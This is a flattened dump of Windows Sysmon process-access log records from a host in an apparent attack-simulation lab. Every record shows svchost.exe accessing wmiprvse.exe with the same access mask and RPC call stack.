13:29:53.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.826{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009500Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.810{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009499Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.810{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009498Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.810{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009497Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009496Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009495Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009494Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009493Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009492Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009491Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009490Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009489Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.795{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.779{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009487Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.779{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009486Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.779{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.764{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.748{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009481Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.748{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009480Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.748{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009479Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009478Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:53.717{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4751-6000-0405-000000009A01}1264C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009477Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 